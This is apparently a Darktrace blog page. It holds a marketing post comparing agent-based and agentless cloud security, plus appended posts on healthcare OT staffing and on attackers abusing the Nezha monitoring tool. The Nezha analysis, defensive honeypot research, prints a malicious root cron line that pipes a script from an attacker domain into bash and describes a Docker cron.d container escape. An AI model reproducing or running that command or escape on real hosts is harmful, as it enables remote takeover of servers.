Blog
/
/
January 13, 2025

Agent vs. Agentless Cloud Security: Why Deployment Methods Matter

Cloud security solutions can be deployed with agentless or agent-based approaches or use a combination of methods. Organizations must weigh which method applies best to the assets and data the tool will protect.
Written by
Kellie Regan
Director, Product Marketing - Cloud Security
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Kellie Regan
Director, Product Marketing - Cloud Security
Default blog image
13
Jan 2025

The rapid adoption of cloud technologies has brought significant security challenges for organizations of all sizes. According to recent studies, over 70% of enterprises now operate in hybrid or multi-cloud environments, with 93% employing a multi-cloud strategy[1]. This complexity requires robust security tools, but opinions vary on the best deployment method—agent-based, agentless, or a combination of both.

Agent-based and agentless cloud security approaches offer distinct benefits and limitations, and organizations often make deployment choices based on their unique needs depending on the function of the specific assets covered, the types of data stored, and cloud architecture, such as hybrid or multi-cloud deployments.

For example, agentless solutions are increasingly favored for their ease of deployment and ability to provide broad visibility across dynamic cloud environments. These are especially useful for DevOps teams, with 64% of organizations citing faster deployment as a key reason for adopting agentless tools[2].

On the other hand, agent-based solutions remain the preferred choice for environments requiring deep monitoring and granular control, such as securing sensitive high-value workloads in industries like finance and healthcare. In fact, over 50% of enterprises with critical infrastructure report relying on agent-based solutions for their advanced protection capabilities[3].

As the debate continues, many organizations are turning to combined approaches, leveraging the strengths of both agent-based and agentless tools to address the full spectrum of their security needs for comprehensive coverage. Understanding the capabilities and limitations of these methods is critical to building an effective cloud security strategy that adapts to evolving threats and complex infrastructures.

Agent-based cloud security

Agent-based security solutions involve deploying software agents on each device or system that needs protection. Agent-based solutions are great choices when you need in-depth monitoring and protection capabilities. They are ideal for organizations that require deep security controls and real-time active response, particularly in hybrid and on-premises environments.

Key advantages include:

1. Real-time monitoring and protection: Agents detect and block threats like malware, ransomware, and anomalous behaviors in real time, providing ongoing protection and enforcing compliance by continuously monitoring workload activities.  Agents enable full control over workloads for active response such as blocking IP addresses, killing processes, disabling accounts, and isolating infected systems from the network, stopping lateral movement.

2. Deep visibility for hybrid environments: Agent-based approaches allow for full visibility across on-premises, hybrid, and multi-cloud environments by deploying agents on physical and virtual machines. Agents offer detailed insights into system behavior, including processes, files, memory, network connections, and more, detecting subtle anomalies that might indicate security threats. Host-based monitoring tracks vulnerabilities at the system and application level, including unpatched software, rogue processes, and unauthorized network activity.

3. Comprehensive coverage: Agents are very effective in hybrid environments (cloud and on-premises), as they can be installed on both physical and virtual machines.  Agents can function independently on each host device onto which they are installed, which is especially helpful for endpoints that may operate outside of constant network connectivity.

Challenges:

1. Resource-intensive: Agents can consume CPU, memory, and network resources, which may affect performance, especially in environments with large numbers of workloads or ephemeral resources.

2. Challenging in dynamic environments: Managing hundreds or thousands of agents in highly dynamic or ephemeral environments (e.g., containers, serverless functions) can be complex and labor-intensive.

3. Slower deployment: Requires agent installation on each workload or instance, which can be time-consuming, particularly in large or complex environments.  

Agentless cloud security

Agentless security does not require software agents to be installed on each device. Instead, it uses cloud infrastructure and APIs to perform security checks. Agentless solutions are highly scalable with minimal impact on performance, and ideal for cloud-native and highly dynamic environments like serverless and containerized. These solutions are great choices for your cloud-native and multi-cloud environments where rapid deployment, scalability, and minimal impact on performance are critical, but response actions can be handled through external tools or manual processes.

Key advantages include:

1. Scalability and ease of deployment: Because agentless security doesn’t require installation on each individual device, it is much easier to deploy and can quickly scale across a vast number of cloud assets. This approach is ideal for environments where resources are frequently created and destroyed (e.g., serverless, containerized workloads), as there is no need for agent installation or maintenance.

2. Reduced system overhead: Without the need to run local agents, agentless security minimizes the impact on system performance. This is crucial in high-performance environments.

3. Broad visibility: Agentless security connects via API to cloud service providers, offering near-instant visibility and threat detection. It provides a comprehensive view of your cloud environment, making it easier to manage and secure large and complex infrastructures.

Challenges

1. Infrastructure-level monitoring: Agentless solutions rely on cloud service provider logs and API calls, meaning that detection might not be as immediate as agent-based solutions. They collect configuration data and logs, focusing on infrastructure misconfigurations, identity risks, exposed resources, and network traffic, but lack visibility and access to detailed, system-level information such as running processes and host-level vulnerabilities.

2. Cloud-focused: Primarily for cloud environments, although some tools may integrate with on-premises systems through API-based data gathering. For organizations with hybrid cloud environments, this approach fragments visibility and security, leading to blind spots and increasing security risk.

3. Passive remediation: Typically provides alerts and recommendations, but lacks deep control over workloads, requiring manual intervention or orchestration tools (e.g., SOAR platforms) to execute responses. Some agentless tools trigger automated responses via cloud provider APIs (e.g., revoking permissions, adjusting security groups), but with limited scope.

Combined agent-based and agentless approaches

A combined approach leverages the strengths of both agent-based and agentless security for complete coverage. This hybrid strategy helps security teams achieve comprehensive coverage by:

  • Using agent-based solutions for deep, real-time protection and detailed monitoring of critical systems or sensitive workloads.
  • Employing agentless solutions for fast deployment, broader visibility, and easier scalability across all cloud assets, which is particularly useful in dynamic cloud environments where workloads frequently change.

The combined approach has distinct practical applications. For example, imagine a financial services company that deals with sensitive transactions. Its security team might use agent-based security for critical databases to ensure stringent protections are in place. Meanwhile, agentless solutions could be ideal for less critical, transient workloads in the cloud, where rapid scalability and minimal performance impact are priorities. With different data types and infrastructures, the combined approach is best.

Best of both worlds: The benefits of a combined approach

The combined approach not only maximizes security efficacy but also aligns with diverse operational needs. This means that all parts of the cloud environment are secured according to their risk profile and functional requirements. Agent-based deployment provides in-depth monitoring and active protection against threats, suitable for environments requiring tight security controls, such as financial services or healthcare data processing systems. Agentless deployment complements agents by offering broader visibility and easier scalability across diverse and dynamic cloud environments, ideal for rapidly changing cloud resources.

There are three major benefits from combining agent-based and agentless approaches.

1. Building a holistic security posture: By integrating both agent-based and agentless technologies, organizations can ensure that all parts of their cloud environments are covered—from persistent, high-risk endpoints to transient cloud resources. This comprehensive coverage is crucial for detecting and responding to threats promptly and effectively.

2. Reducing overhead while boosting scalability: Agentless systems require no software installation on each device, reducing overhead and eliminating the need to update and maintain agents on a large number of endpoints. This makes it easier to scale security as the organization grows or as the cloud environment changes.

3. Applying targeted protection where needed: Agent-based solutions can be deployed on selected assets that handle sensitive information or are critical to business operations, thus providing focused protection without incurring the costs and complexity of universal deployment.

Use cases for a combined approach

A combined approach gives security teams the flexibility to deploy agent-based and agentless solutions based on the specific security requirements of different assets and environments. As a result, organizations can optimize their security expenditures and operational efforts, allowing for greater adaptability in cloud security use cases.

Let’s take a look at how this could practically play out. In the combined approach, agent-based security can perform the following:

1. Deep monitoring and real-time protection:

  • Workload threat detection: Agent-based solutions monitor individual workloads for suspicious activity, such as unauthorized file changes or unusual resource usage, providing high granularity for detecting threats within critical cloud applications.
  • Behavioral analysis of applications: By deploying agents on virtual machines or containers, organizations can monitor behavior patterns and flag anomalies indicative of insider threats, lateral movement, or Advanced Persistent Threats (APTs).
  • Protecting high-sensitivity environments: Agents provide continuous monitoring and advanced threat protection for environments processing sensitive data, such as payment processing systems or healthcare records, leveraging capabilities like memory protection and file integrity monitoring.

2. Cloud asset protection:

  • Securing critical infrastructure: Agent-based deployments are ideal for assets like databases or storage systems that require real-time defense against exploits and ransomware.
  • Advanced packet inspection: For high-value assets, agents offer deep packet inspection and in-depth logging to detect stealthy attacks such as data exfiltration.
  • Customizable threat response: Agents allow for tailored security rules and automated responses at the workload level, such as shutting down compromised instances or quarantining infected files.

At the same time, agentless cloud security provides complementary benefits such as:

1. Broad visibility and compliance:

  • Asset discovery and management: Agentless systems can quickly scan the entire cloud environment to identify and inventory all assets, a crucial capability for maintaining compliance with regulations like GDPR or HIPAA, which require up-to-date records of data locations and usage.
  • Regulatory compliance auditing and configuration management: Quickly identify gaps in compliance frameworks like PCI DSS or SOC 2 by scanning configurations, permissions, and audit trails without installing agents. Using APIs to check configurations across cloud services ensures that all instances comply with organizational and regulatory standards, an essential aspect for maintaining security hygiene and compliance.
  • Shadow IT Detection: Detect and map unauthorized cloud services or assets that are spun up without security oversight, ensuring full inventory coverage.

2. Rapid environmental assessment:

  • Vulnerability assessment of new deployments: In environments where new code is frequently deployed, agentless security can quickly assess new instances, containers, or workloads in CI/CD pipelines for vulnerabilities and misconfigurations, enabling secure deployments at DevOps speed.
  • Misconfiguration alerts: Detect and alert on common cloud configuration issues, such as exposed storage buckets or overly permissive IAM roles, across cloud providers like AWS, Azure, and GCP.
  • Policy enforcement: Validate that new resources adhere to established security baselines and organizational policies, preventing security drift during rapid cloud scaling.

Combining agent-based and agentless approaches in cloud security not only maximizes the protective capabilities, but also offers flexibility, efficiency, and comprehensive coverage tailored to the diverse and evolving needs of modern cloud environments. This integrated strategy ensures that organizations can protect their assets more effectively while also adapting quickly to new threats and regulatory requirements.

Darktrace offers complementary and flexible deployment options for holistic cloud security

Powered by multilayered AI, Darktrace / CLOUD is a Cloud Detection and Response (CDR) solution that is agentless by default, with optional lightweight, host-based server agents for enhanced real-time actioning and deep inspection. As such, it can deploy in cloud environments in minutes and provide unified visibility and security across hybrid, multi-cloud environments.

With any deployment method, Darktrace supports multi-tenant, hybrid, and serverless cloud environments. Its Self-Learning AI learns the normal behavior across architectures, assets, and users to identify unusual activity that may indicate a threat. With this approach, Darktrace / CLOUD quickly disarms threats, whether they are known, unknown, or completely novel. It then accelerates the investigation process and responds to threats at machine speed.

Learn more about how Darktrace / CLOUD secures multi and hybrid cloud environments in the Solution Brief.

References:

1. Flexera 2023 State of the Cloud Report

2. ESG Research 2023 Report on Cloud-Native Security

3. Gartner, Market Guide for Cloud Workload Protection Platforms, 2023

Written by
Kellie Regan
Director, Product Marketing - Cloud Security
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Kellie Regan
Director, Product Marketing - Cloud Security

How Attackers Abuse the Chinese Nezha Monitoring Tool

Network
June 10, 2026
Nathaniel Bill
Malware Research Engineer
Watch the NIS2 Webinar
Trending blogs
1
Prompt Security in Enterprise AI: Strengths, Weaknesses, and Common Approaches
May 20, 2026
2
How Empowering End Users can Improve Your Email Security and Decrease the Burden on the SOC
May 8, 2024
3
Elevating Network Security: Confronting Trust, Ransomware, & Novel Attacks
Jun 21, 2024
4
The State of AI in Cybersecurity: Unveiling Global Insights from 1,800 Security Practitioners
Apr 9, 2024
5
The State of AI in Cybersecurity: The Impact of AI on Cybersecurity Solutions
May 13, 2024

More in this series

No items found.
Continue reading
No items found.

Blog

/

Network

/

June 10, 2026

How Attackers Abuse the Chinese Nezha Monitoring Tool

nezha monitoring toolDefault blog imageDefault blog image

What is Nezha?

Nezha is an open-source tool that allows system administrators to centrally monitor multiple servers, including their resource usage such as CPU and network usage, and uptime. The tool also enables remote administrative access via an interactive shell.

The project has just under 10,000 stars on GitHub and has seen widespread adoption in the Chinese IT community, with many forum posts providing guides on installation and usage.

However, Nezha’s status as a legitimate executable that has remote access capabilities creates an opportunity for misuse. Instead of deploying a regular command-and-control (C2) implant, attackers can deploy Nezha directly on compromised hosts. As these deployments are functionally indistinguishable from legitimate installations, they can blend into expected operational tooling and evade detection.

Darktrace’s analysis of a Nezha infection

Darktrace operates several high-interaction honeypots to observe attacker techniques and behaviors. Darktrace analysts observed an intrusion against the Docker-based honeypot, initiated with a malicious container create command.

The malicious container create command.
Figure 1: The malicious container create command.

Docker allows any host file or directory to be passed through to a container, granting read and write access. In this case, the attacker made use of this to pass through the cron.d directory, which is used to schedule recurring tasks, such as maintenance or backup commands.

These commands and timings are stored in the cron.d directory, which the attacker can now write to because it is passed through to their malicious container. By writing a job to this directory from within the container, the cron service running on the host detects the new job and executes it on the host, effectively allowing the attacker to escape the container.

The attacker the created a malicious cron job named ngk:
* * * * * root curl hxxps://file.gpu5[.]com/linux_install.sh | bash

This resulted in the host downloading and running the linux_install.sh file with root privileges.

The linux_install script installs several dependencies, sets up environmental variables, and retrieves a second-stage script (nezha_install.sh) from the same domain.

The linux_install script.
Figure 2: The linux_install script.

The nezha_install.sh script based on the official Nezha installer but has been modified to hard code configuration values, such as the server address, and to remove interactive prompts, allowing it to be installed without user input.

Open by design

One of Nezha’s most interesting design choices is that its main monitoring panel does not require authentication to view a list of monitored hosts. This exposes a list of compromised systems via the attacker-controlled panel, enabling direct observation of the operation’s scale, victimology and infrastructure.

The attacker’s Nezha dashboard.
Figure 3: The attacker’s Nezha dashboard.

At the time of analysis, the campaign had infected 141 servers, with 45 still online and accessible.  The number of online servers was previously higher, suggesting that some victims may have discovered and removed the infection.

The exposed dashboard provides insights into victim characteristics, including geographic distribution, hardware specification, and resource usage. Most infected hosts were low-spec systems, commonly one or two core Xeon CPUs and less than 4GB of RAM, indicating they were likely small virtual private servers (VPS) with limited value to the attacker.

Many systems also exhibited 100% CPU usage, which may indicate concurrent compromise, such as cryptocurrency mining activity by other threat actors.

Open-source intelligence platforms such as Shodan and Censys can also identify publicly exposed instances of Nezha. Although authentication is required to execute commands on a monitored server, visibility into dashboards still provides valuable intelligence for attackers and defenders alike.

At the time of writing, Darktrace identified 33 internet-facing Nezha installations as openly accessible.

Key takeaways

The abuse of legitimate software has become a consistent feature of modern intrusion activity, enabling attackers to operate without deploying traditional malware and reducing the risk of detection.

This creates a form of “trust inversion”, where tools typically associated with routine operations may instead indicate malicious activity when deployed outside expected contexts. Organizations should therefore prioritize asset visibility and software governance, ensuring that unexpected tool deployments can be identified and investigated, rather than focusing solely on malware-centric detection.

This challenge is especially pronounced in cloud environments, where legitimate monitoring tools may represent either essential software or an attacker backdoor. The scale and dynamic nature of cloud environments further complicate distinguishing between benign and malicious use.

Credit to Nathaniel Bill (Malware Research Engineer)
Edited by Ryan Traill (Content Manager)

Continue reading
About the author
Nathaniel Bill
Malware Research Engineer

Blog

/

OT

/

June 9, 2026

Healthcare’s OT Cybersecurity Gap: Why Hospitals Must Make the Same Security Investments as Regulated Critical Infrastructures

healthcare OTDefault blog imageDefault blog image

Rethinking the healthcare attack surface

When most people think about Operational Technology (OT) cybersecurity, they think about oil & gas pipelines, utilities, manufacturing plants, or power grids. However, hospitals & healthcare systems have quickly become a point of focus in the OT cybersecurity community as they do employ a variety of OT in the form of IoMT (Internet of Medical Things) networked devices such as: infusion pumps, imaging systems, patient monitoring equipment, laboratory systems, and traditional industrial control systems (ICS) in the form of smart building management systems (BMS) and even on site power generation control systems. 

These healthcare environments are no longer just traditional IT ecosystems, they are cyber-physical environments where disruption can directly impact patient care, operational continuity, and ultimately patient safety.

The OT cybersecurity expertise gap in healthcare organizations

Our research in the OT cybersecurity space revealed a concerning trend. Many hospitals and healthcare networks lack dedicated OT cybersecurity teams, OT security full time employees (FTE) and even OT expertise in the form of OT security certifications when compared to other critical infrastructure sectors.

On the other hand, within industries such as energy and manufacturing, we encounter more mature OT security programs that employ full time employees  dedicated to OT cybersecurity with OT security certifications and expertise to secure industrial and operational environments and lead investment in OT security processes and technology.

When reviewing the top 20 U.S. Hospitals by market cap, given what is publicly available on LinkedIn, only one FTE with an OT cybersecurity certification was found. The certifications that were searched for include: GIAC GICSP, GIAC GRID, GIAC GCIP and all ISA/IEC 62443 certifications. When replicating this same search across the top 20 utility providers in the US, 73 FTEs with OT related certifications were identified. As a control group, we looked within financial services, an industry NOT expected to have OT systems worth investing in FTEs to protect. However, the top 20 US financial institutions had 18 FTEs with OT related certifications. 

What these findings reveal

Overall, the findings regarding healthcare investment in OT security FTEs are surprising given how operationally dependent modern healthcare has become on OT. So why aren't hospitals investing in OT security personnel at the rate of peer critical infrastructures? It could just be lack of awareness; however, there are other, more plausible reasons.  

Based on historical trends in cyber incidents within the healthcare space, one could speculate that there is significantly greater likelihood of being victim to an attack that  focuses on extortion or data theft rather than an attack on specific OT systems. The amount of ransomware events incurred in healthcare, that historically do not target OT systems, may divert attention and security investment to the parts of the attack surface most likely to be targeted by ransomware. Additionally, data theft is a relevant threat objective for hospitals given PHI, PCI and PII, and data theft does not traditionally align with attacks targeting OT.  

However, with focused investment to address data theft and with adversaries new capability to string together chains of vulnerabilities of different severity scores using advancements in AI, we could be entering a threat landscape where adversaries pivot their tactics to target exposed and under protected devices and systems like OT. For example, although not a patient records database, predominant IOMT protocols HL7 and DICOM are unencrypted plaintext protocols and unless encrypted it is very simple for adversaries, who are sniffing traffic, to identify protected health information (PHI) in these communication protocols.

Why OT cybersecurity expertise can be effective for healthcare organizations

The convergence of IT, OT, and IoMT is already here, and threat actors are increasingly aware of the operational vulnerabilities that come with it. Additionally, as AI solutions such as agentic or generative applications are adopted and deployed, the attack surface will continue to change as permissions, and new connections will exist to support AI efficiency. From a cybersecurity standpoint, the reality is that many healthcare organizations are still working to establish consistent visibility and governance across their enterprise-connected devices and systems as their attack surface is changing in real time.  As the healthcare sector remains a significant target for cyber-attacks, hospitals would be well advised to begin addressing their operational environments OT as a critical component of their attack surface and invest in securing them first with people, then process and technology. 

What can healthcare organizations do to secure their OT

Including OT in current cybersecurity processes such as red teaming and testing incident response plans that take OT into account alongside building dedicated OT security capabilities including improving OT network visibility, leveraging OT network anomaly detection, micro-segmentation, and secure remote access will become essential steps in strengthening healthcare resilience. 

However, before any of the above processes or investments in technology can be made, these healthcare organizations, like the other critical infrastructure sectors, need to invest in the people with the experience in OT security to lead, implement, manage and audit the investment in OT cybersecurity technology and processes.  In cases where headcount cannot be added, investment in OT security certifications, such as the ones listed in this article, and participation on OT security events focused on practitioner training for existing cybersecurity employees can move the needle in terms of bringing OT expertise to the existing team.  

In an industry where uptime and safety are as mission critical as they are for a power utility, OT cybersecurity FTEs can no longer be viewed as optional for healthcare organizations and must become part of the foundation of modern healthcare cybersecurity strategy. 

[related-resource]

Continue reading
About the author
Daniel Simonds
Director of Operational Technology
Your data. Our AI.
Elevate your network security with Darktrace AI